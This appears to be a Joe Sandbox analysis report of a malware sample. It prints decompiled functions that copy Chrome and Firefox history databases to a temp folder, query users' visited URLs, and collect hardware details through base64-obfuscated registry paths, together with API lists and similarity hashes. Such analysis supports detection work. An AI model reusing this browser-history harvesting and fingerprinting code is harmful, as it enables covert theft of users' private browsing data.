                                                                                                    0x00401935
                                                                                                    0x0040193f
                                                                                                    0x00401a13
                                                                                                    0x00401945
                                                                                                    0x00401947
                                                                                                    0x00401948
                                                                                                    0x0040194d
                                                                                                    0x00401950
                                                                                                    0x0040195a
                                                                                                    0x0040195c
                                                                                                    0x00401961
                                                                                                    0x00401961
                                                                                                    0x00401966
                                                                                                    0x0040196d
                                                                                                    0x00401973
                                                                                                    0x0040197a
                                                                                                    0x0040197f
                                                                                                    0x00401999
                                                                                                    0x00401992
                                                                                                    0x00401997
                                                                                                    0x00401997
                                                                                                    0x004019a6
                                                                                                    0x004019b0
                                                                                                    0x004019ba
                                                                                                    0x004019bf
                                                                                                    0x004019c6
                                                                                                    0x004019ca
                                                                                                    0x004019d1
                                                                                                    0x004019d6
                                                                                                    0x004019db
                                                                                                    0x004019e1
                                                                                                    0x004019e4
                                                                                                    0x004019e7
                                                                                                    0x004019f3
                                                                                                    0x004019f5
                                                                                                    0x004019fa
                                                                                                    0x004019fa
                                                                                                    0x004019ff
                                                                                                    0x00401a04
                                                                                                    0x00401a09
                                                                                                    0x00401a09

                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32((.M,00000000,00401A0A), ref: 00401961
                                                                                                    • LocalFree.KERNEL32(004D4A48,00000000,00401A0A), ref: 00401973
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,004D4A48,00000000,00401A0A), ref: 00401992
                                                                                                    • LocalFree.KERNEL32(004D5A48,?,00000000,00008000,004D4A48,00000000,00401A0A), ref: 004019D1
                                                                                                    • RtlLeaveCriticalSection.KERNEL32((.M,00401A11,004D4A48,00000000,00401A0A), ref: 004019FA
                                                                                                    • RtlDeleteCriticalSection.KERNEL32((.M,00401A11,004D4A48,00000000,00401A0A), ref: 00401A04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                    • String ID: (.M$HJM$HZM
                                                                                                    • API String ID: 3782394904-873039599
                                                                                                    • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                    • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                    • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                    • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004129A4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 49%
                                                                                                    			E004129A4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				long _t73;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v8; // 0x6f747365
				E004040F4(_t3);
				_push(_t217);
				_push(0x412c71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t4 =  &_v28; // 0x6f747351
				E00403B80(_t4);
				_push(_t217);
				_push(0x412be7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t73 = GetTickCount();
				_t5 =  &_v60; // 0x6f747331
				E00406FDC(_t73, __ebx, _t5, __esi, _t223);
				_push(_v60);
				_t7 =  &_v64; // 0x6f74732d
				E00406F1C(_t7, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				_t10 =  &_v40; // 0x6f747345
				E0040781C(_v8, _t177, _t10, _t223);
				_t12 =  &_v72; // 0x6f747325
				E004062D8(L"%TEMP%", _t12, _t223);
				_push(_v72);
				_push(0x412ca8);
				_push(_v32);
				E00403E1C();
				_t17 =  &_v44; // 0x6f747341
				E0040781C(_v68, _t177, _t17, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				_t20 =  &_v76; // 0x6f747321
				E0040377C(_t20, _v44);
				_t23 =  &_v36; // 0x6f747349
				E00404AFC(_v76, _t177, _t178, _t23, _t215, _t223);
				_t24 =  &_v80; // 0x6f74731d
				E00403D2C(_t24, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(E00412D70);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412d78);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x412d84);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412C78);
				_t58 =  &_v92; // 0x6f747311
				E00403B98(_t58, 4);
				_t59 =  &_v76; // 0x6f747321
				E004034E4(_t59);
				_t60 =  &_v72; // 0x6f747325
				E00403B98(_t60, 4);
				_t61 =  &_v56; // 0x6f747335
				E00403508(_t61, 3);
				_t62 =  &_v44; // 0x6f747341
				E00403B98(_t62, 2);
				_t63 =  &_v36; // 0x6f747349
				E004034E4(_t63);
				_t64 =  &_v32; // 0x6f74734d
				E00403B98(_t64, 2);
				_t65 =  &_v8; // 0x6f747365
				return E00403B80(_t65);
			}















































                                                                                                    0x004129a4
                                                                                                    0x004129a4
                                                                                                    0x004129a5
                                                                                                    0x004129a7
                                                                                                    0x004129ac
                                                                                                    0x004129ac
                                                                                                    0x004129ae
                                                                                                    0x004129b0
                                                                                                    0x004129b0
                                                                                                    0x004129b0
                                                                                                    0x004129b3
                                                                                                    0x004129b4
                                                                                                    0x004129b5
                                                                                                    0x004129b6
                                                                                                    0x004129b9
                                                                                                    0x004129bc
                                                                                                    0x004129bf
                                                                                                    0x004129c6
                                                                                                    0x004129c7
                                                                                                    0x004129cc
                                                                                                    0x004129cf
                                                                                                    0x004129d2
                                                                                                    0x004129d5
                                                                                                    0x004129dc
                                                                                                    0x004129dd
                                                                                                    0x004129e2
                                                                                                    0x004129e5
                                                                                                    0x004129e8
                                                                                                    0x004129ed
                                                                                                    0x004129f0
                                                                                                    0x004129f5
                                                                                                    0x004129f8
                                                                                                    0x004129fb
                                                                                                    0x00412a00
                                                                                                    0x00412a03
                                                                                                    0x00412a10
                                                                                                    0x00412a15
                                                                                                    0x00412a1b
                                                                                                    0x00412a20
                                                                                                    0x00412a28
                                                                                                    0x00412a2d
                                                                                                    0x00412a30
                                                                                                    0x00412a35
                                                                                                    0x00412a40
                                                                                                    0x00412a48
                                                                                                    0x00412a4b
                                                                                                    0x00412a55
                                                                                                    0x00412a64
                                                                                                    0x00412a69
                                                                                                    0x00412a6f
                                                                                                    0x00412a77
                                                                                                    0x00412a7a
                                                                                                    0x00412a7f
                                                                                                    0x00412a85
                                                                                                    0x00412a94
                                                                                                    0x00412ab0
                                                                                                    0x00412ab7
                                                                                                    0x00412ab9
                                                                                                    0x00412abc
                                                                                                    0x00412abe
                                                                                                    0x00412ad7
                                                                                                    0x00412ade
                                                                                                    0x00412ae0
                                                                                                    0x00412ae3
                                                                                                    0x00412ae5
                                                                                                    0x00412baa
                                                                                                    0x00412bae
                                                                                                    0x00412bb5
                                                                                                    0x00412bb8
                                                                                                    0x00412bbb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00412af3
                                                                                                    0x00412afb
                                                                                                    0x00412b03
                                                                                                    0x00412b0e
                                                                                                    0x00412b1f
                                                                                                    0x00412b2a
                                                                                                    0x00412b3b
                                                                                                    0x00412b46
                                                                                                    0x00412b4d
                                                                                                    0x00412b4f
                                                                                                    0x00412b57
                                                                                                    0x00412b5c
                                                                                                    0x00412b5f
                                                                                                    0x00412b6a
                                                                                                    0x00412b6f
                                                                                                    0x00412b72
                                                                                                    0x00412b7d
                                                                                                    0x00412b82
                                                                                                    0x00412b85
                                                                                                    0x00412b90
                                                                                                    0x00412b95
                                                                                                    0x00412b98
                                                                                                    0x00412ba5
                                                                                                    0x00412ba5
                                                                                                    0x00412baa
                                                                                                    0x00412ae5
                                                                                                    0x00412bc1
                                                                                                    0x00412bc5
                                                                                                    0x00412bcc
                                                                                                    0x00412bd3
                                                                                                    0x00412bda
                                                                                                    0x00412bdf
                                                                                                    0x00412be2
                                                                                                    0x00412bf7
                                                                                                    0x00412c05
                                                                                                    0x00412a96
                                                                                                    0x00412a98
                                                                                                    0x00412a9b
                                                                                                    0x00412a9b
                                                                                                    0x00412c0c
                                                                                                    0x00412c0f
                                                                                                    0x00412c12
                                                                                                    0x00412c17
                                                                                                    0x00412c1f
                                                                                                    0x00412c24
                                                                                                    0x00412c27
                                                                                                    0x00412c2c
                                                                                                    0x00412c34
                                                                                                    0x00412c39
                                                                                                    0x00412c41
                                                                                                    0x00412c46
                                                                                                    0x00412c4e
                                                                                                    0x00412c53
                                                                                                    0x00412c56
                                                                                                    0x00412c5b
                                                                                                    0x00412c63
                                                                                                    0x00412c68
                                                                                                    0x00412c70

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,00412BE7,?,00000000,00412C71,?,00000000,0041B0FC,00000000,00000000,00000000,?,00412ED4,\History,?,00413008), ref: 004129E8
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00412A64
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                                                                                                    Strings
                                                                                                    • %TEMP%, xrefs: 00412A23
                                                                                                    • .tmp, xrefs: 00412A03
                                                                                                    • , xrefs: 00412B98
                                                                                                    • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CopyCountDeleteTick
                                                                                                    • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                                                    • API String ID: 2381671008-351388873
                                                                                                    • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                    • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
                                                                                                    • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                    • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041256C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 43%
                                                                                                    			E0041256C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t217);
				_push(0x412839);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00403B80( &_v28);
				_push(_t217);
				_push(0x4127af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00406FDC(GetTickCount(), __ebx,  &_v60, __esi, _t223);
				_push(_v60);
				E00406F1C( &_v64, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t177,  &_v40, _t223);
				E004062D8(L"%TEMP%",  &_v72, _t223);
				_push(_v72);
				_push(0x412870);
				_push(_v32);
				E00403E1C();
				E0040781C(_v68, _t177,  &_v44, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				E0040377C( &_v76, _v44);
				E00404AFC(_v76, _t177, _t178,  &_v36, _t215, _t223);
				E00403D2C( &_v80, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(0x412978);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412980);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x41298c);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412840);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B98( &_v72, 4);
				E00403508( &_v56, 3);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}














































                                                                                                    0x0041256c
                                                                                                    0x0041256c
                                                                                                    0x0041256d
                                                                                                    0x0041256f
                                                                                                    0x00412574
                                                                                                    0x00412574
                                                                                                    0x00412576
                                                                                                    0x00412578
                                                                                                    0x00412578
                                                                                                    0x00412578
                                                                                                    0x0041257b
                                                                                                    0x0041257c
                                                                                                    0x0041257d
                                                                                                    0x0041257e
                                                                                                    0x00412581
                                                                                                    0x00412587
                                                                                                    0x0041258e
                                                                                                    0x0041258f
                                                                                                    0x00412594
                                                                                                    0x00412597
                                                                                                    0x0041259d
                                                                                                    0x004125a4
                                                                                                    0x004125a5
                                                                                                    0x004125aa
                                                                                                    0x004125ad
                                                                                                    0x004125b8
                                                                                                    0x004125bd
                                                                                                    0x004125c3
                                                                                                    0x004125c8
                                                                                                    0x004125cb
                                                                                                    0x004125d8
                                                                                                    0x004125e3
                                                                                                    0x004125f0
                                                                                                    0x004125f5
                                                                                                    0x004125f8
                                                                                                    0x004125fd
                                                                                                    0x00412608
                                                                                                    0x00412613
                                                                                                    0x0041261d
                                                                                                    0x0041262c
                                                                                                    0x00412637
                                                                                                    0x00412642
                                                                                                    0x0041264d
                                                                                                    0x0041265c
                                                                                                    0x00412678
                                                                                                    0x0041267f
                                                                                                    0x00412681
                                                                                                    0x00412684
                                                                                                    0x00412686
                                                                                                    0x0041269f
                                                                                                    0x004126a6
                                                                                                    0x004126a8
                                                                                                    0x004126ab
                                                                                                    0x004126ad
                                                                                                    0x00412772
                                                                                                    0x00412776
                                                                                                    0x0041277d
                                                                                                    0x00412780
                                                                                                    0x00412783
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004126bb
                                                                                                    0x004126c3
                                                                                                    0x004126cb
                                                                                                    0x004126d6
                                                                                                    0x004126e7
                                                                                                    0x004126f2
                                                                                                    0x00412703
                                                                                                    0x0041270e
                                                                                                    0x00412715
                                                                                                    0x00412717
                                                                                                    0x0041271f
                                                                                                    0x00412724
                                                                                                    0x00412727
                                                                                                    0x00412732
                                                                                                    0x00412737
                                                                                                    0x0041273a
                                                                                                    0x00412745
                                                                                                    0x0041274a
                                                                                                    0x0041274d
                                                                                                    0x00412758
                                                                                                    0x0041275d
                                                                                                    0x00412760
                                                                                                    0x0041276d
                                                                                                    0x0041276d
                                                                                                    0x00412772
                                                                                                    0x004126ad
                                                                                                    0x00412789
                                                                                                    0x0041278d
                                                                                                    0x00412794
                                                                                                    0x0041279b
                                                                                                    0x004127a2
                                                                                                    0x004127a7
                                                                                                    0x004127aa
                                                                                                    0x004127bf
                                                                                                    0x004127cd
                                                                                                    0x0041265e
                                                                                                    0x00412660
                                                                                                    0x00412663
                                                                                                    0x00412663
                                                                                                    0x004127d4
                                                                                                    0x004127d7
                                                                                                    0x004127da
                                                                                                    0x004127e7
                                                                                                    0x004127ef
                                                                                                    0x004127fc
                                                                                                    0x00412809
                                                                                                    0x00412816
                                                                                                    0x0041281e
                                                                                                    0x0041282b
                                                                                                    0x00412838

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,004127AF,?,00000000,00412839,?,00000000,0041B0FC,00000000,00000000,00000000,?,0041316A,\places.sqlite,?,004132A0), ref: 004125B0
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 0041262C
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 004127CD
                                                                                                    Strings
                                                                                                    • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
                                                                                                    • , xrefs: 00412760
                                                                                                    • .tmp, xrefs: 004125CB
                                                                                                    • %TEMP%, xrefs: 004125EB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CopyCountDeleteTick
                                                                                                    • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                                                                                                    • API String ID: 2381671008-462058183
                                                                                                    • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                    • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
                                                                                                    • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                    • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416744 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00416744(signed int __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t112;
				void* _t116;
				intOrPtr _t119;
				intOrPtr _t120;

				_t117 = __esi;
				_t38 = __eax | 0x5500000a;
				_t119 = _t120;
				_t92 = 0xb;
				do {
					_push(0);
					_push(0);
					_t92 = _t92 - 1;
					_t122 = _t92;
				} while (_t92 != 0);
				_t91 = _t38;
				_push(_t119);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t91);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t93);
				E00407500(0x80000002, _t91, _t93, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t91);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v72);
				_push( *_t91);
				_push("GetRAM: ");
				E00416584( &_v88, _t91, _t117, _t122);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t91);
				_push("Video Info\r\n");
				E00416644( &_v92, _t91, _t116, _t117);
				_push(_v92);
				E00403850();
				_t112 = 0x4169ac;
				 *[fs:eax] = _t112;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}

























                                                                                                    0x00416744
                                                                                                    0x00416744
                                                                                                    0x00416749
                                                                                                    0x0041674b
                                                                                                    0x00416750
                                                                                                    0x00416750
                                                                                                    0x00416752
                                                                                                    0x00416754
                                                                                                    0x00416754
                                                                                                    0x00416754
                                                                                                    0x00416758
                                                                                                    0x0041675c
                                                                                                    0x0041675d
                                                                                                    0x00416762
                                                                                                    0x00416765
                                                                                                    0x0041676c
                                                                                                    0x00416776
                                                                                                    0x0041677b
                                                                                                    0x0041677e
                                                                                                    0x00416783
                                                                                                    0x00416788
                                                                                                    0x00416791
                                                                                                    0x0041679c
                                                                                                    0x004167a4
                                                                                                    0x004167ad
                                                                                                    0x004167b8
                                                                                                    0x004167c5
                                                                                                    0x004167c6
                                                                                                    0x004167cb
                                                                                                    0x004167ce
                                                                                                    0x004167db
                                                                                                    0x004167e5
                                                                                                    0x004167f4
                                                                                                    0x004167ff
                                                                                                    0x00416804
                                                                                                    0x0041680d
                                                                                                    0x00416812
                                                                                                    0x00416815
                                                                                                    0x00416822
                                                                                                    0x0041682c
                                                                                                    0x00416831
                                                                                                    0x00416833
                                                                                                    0x0041683b
                                                                                                    0x00416840
                                                                                                    0x00416843
                                                                                                    0x0041684f
                                                                                                    0x00416854
                                                                                                    0x00416856
                                                                                                    0x0041685e
                                                                                                    0x00416863
                                                                                                    0x00416872
                                                                                                    0x00416879
                                                                                                    0x0041687c
                                                                                                    0x0041687f
                                                                                                    0x0041688c
                                                                                                    0x00416894
                                                                                                    0x0041689c
                                                                                                    0x004168a9
                                                                                                    0x004168b1
                                                                                                    0x004168b9
                                                                                                    0x004168c1
                                                                                                    0x004168d3

                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$InfoSystem
                                                                                                    • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                    • API String ID: 4070941872-1038824218
                                                                                                    • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                    • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                                                                                                    • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                    • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

